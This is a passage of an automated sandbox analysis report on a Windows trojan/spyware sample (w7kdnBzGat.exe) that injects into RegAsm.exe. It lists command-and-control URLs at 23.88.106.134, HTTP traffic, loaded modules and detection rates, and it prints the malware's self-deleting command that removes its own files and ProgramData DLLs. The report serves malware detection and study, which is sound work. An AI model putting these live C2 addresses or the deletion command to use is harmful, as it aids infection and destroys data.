(Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: RegAsm.exe, 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.88.106.134 |
Source: RegAsm.exe, 00000001.00000002.2034339347.0000000000439000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034961312.00000000010C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.88.106.134/84bad7132df89fd7/sqlite3.dll |
Source: RegAsm.exe, 00000001.00000002.2034339347.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034339347.000000000054D000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://23.88.106.134/c73eed764cc59dcb.php |
Source: RegAsm.exe, 00000001.00000002.2034339347.0000000000550000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034339347.000000000054D000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://23.88.106.134/c73eed764cc59dcb.php.0//EN |
Source: RegAsm.exe, 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://23.88.106.134/c73eed764cc59dcb.phpininit.exe |
Source: RegAsm.exe, 00000001.00000002.2034961312.00000000010C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.88.106.134/c73eed764cc59dcb.phpxKr |
Source: Amcache.hve.8.dr | String found in binary or memory: http://upx.sf.net |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F41F4 | 0_2_004F41F4 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004E0250 | 0_2_004E0250 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F2316 | 0_2_004F2316 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00512549 | 0_2_00512549 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F265E | 0_2_004F265E |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F4615 | 0_2_004F4615 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004CA690 | 0_2_004CA690 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004E0690 | 0_2_004E0690 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00516790 | 0_2_00516790 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004FC846 | 0_2_004FC846 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F29B5 | 0_2_004F29B5 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F4A45 | 0_2_004F4A45 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F2CFD | 0_2_004F2CFD |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F308B | 0_2_004F308B |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004DD17E | 0_2_004DD17E |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004AD1A0 | 0_2_004AD1A0 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_0050B28F | 0_2_0050B28F |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F3428 | 0_2_004F3428 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F37B6 | 0_2_004F37B6 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004CFA54 | 0_2_004CFA54 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00517ABC | 0_2_00517ABC |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F3B1B | 0_2_004F3B1B |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004DDC51 | 0_2_004DDC51 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004DFCD0 | 0_2_004DFCD0 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_0050BC81 | 0_2_0050BC81 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F3E8F | 0_2_004F3E8F |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: String function: 004D8C87 appears 42 times | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: String function: 00505231 appears 54 times | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: String function: 004C7E91 appears 126 times | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: String function: 004C7EC4 appears 82 times | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: String function: 004C8F20 appears 78 times | |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004043B0 appears 316 times | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 268 |
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/5@0/1 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_00414DD0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, | 1_2_00414DD0 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_03 |
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4288 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Command line argument: SVWj@h | 0_2_005222C6 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Command line argument: SVWj@h | 0_2_005222C6 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Command line argument: SVWj@h | 0_2_005222C6 |
Source: w7kdnBzGat.exe | ReversingLabs: Detection: 63% |
Source: w7kdnBzGat.exe | Virustotal: Detection: 50% |
Source: RegAsm.exe | String found in binary or memory: <address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address> </body></html> ------JJKFBAKFBGDHIEBGDAKF |
Source: RegAsm.exe | String found in binary or memory: <address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address> </body></html> |
Source: RegAsm.exe | String found in binary or memory: <address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address> </body></html> ------ |
Source: RegAsm.exe | String found in binary or memory: <address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address> </body></html> ------JJKFBAKFBGDHIEBGDAKF |
Source: unknown | Process created: C:\Users\user\Desktop\w7kdnBzGat.exe "C:\Users\user\Desktop\w7kdnBzGat.exe" | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 268 | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 | Jump to behavior |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: pcacli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | Jump to behavior |
Source: w7kdnBzGat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: | Binary string: C:\p2facz8e\output.pdb& source: w7kdnBzGat.exe |
Source: | Binary string: C:\p2facz8e\output.pdb source: w7kdnBzGat.exe |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_0041917C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, | 1_2_0041917C |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004C8F70 push ecx; ret | 0_2_004C8F83 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004C7E5F push ecx; ret | 0_2_004C7E72 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_004176B5 push ecx; ret | 1_2_004176C8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
